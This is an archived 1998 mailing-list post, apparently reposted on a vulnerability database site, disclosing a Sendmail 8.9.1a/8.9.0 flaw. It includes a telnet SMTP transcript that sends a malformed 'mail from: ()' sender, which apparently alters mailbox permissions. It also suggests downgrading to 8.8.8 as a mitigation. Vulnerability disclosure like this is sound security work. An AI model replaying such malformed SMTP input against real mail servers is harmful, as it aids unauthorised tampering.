`Date: Thu, 24 Sep 1998 10:14:06 -0400
From: Simon Smith <[email protected]>
This is not the same attack as the last one regarding the "(".
This one does not make your system hang but rather alters permissions is
seems. If this was already posted please disregard it.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Be conscious that Sendmail 8.9.1a/8.9.0 has a critical security
flaw in it. I have tested this on debain Linux. I have not had time to
hack the source and find out where the hole is. (Yes I am going to give
notice to sendmail.) I have not determined if other systems are open to
this attack, but to check, create a user that you can eliminate.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
begin exploit
*****
bogin:~$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.9.1a/8.9.0; Thu, 24 Sep 1998 09:44:23 -0400
mail from: ()
250 MAILER-DAEMON... Sender ok
rcpt to: tester
250 tester... Recipient ok
data
354 Enter mail, end with "." on a line by itself
bababababa
.250 JAA15070 Message accepted for delivery
quit
221 bogin.ma.ultranet.com closing connection
Connection closed by foreign host.
bogin:~$ su - tester
Password:
bogin:~$ pine
*****
end exploit
That is not the least of it. The mail was sent to tester, but watch what
happens if I read the mail,
then use pine to check e-mail.
I get the following message inside of pine:
"Mailbox vulnerable - directory must have 1777 protection "
Down grading to an preliminary version of sendmail will stop this from
happening to you (8.8.8). If someone was to transmit mail to
[email protected] you would be condemned.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Hmmm it was not like that before.
I am still able to read the email.. but this causes problems..
I apologize that I did not take this any farther. If anyone wants to dig
into this please notify me of your findings
Sincerely,
SIMON
p.s. if this is an old bug please tell me and forward me the details...
not sure how it could be though seing as it is the alpha release.... =oP
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation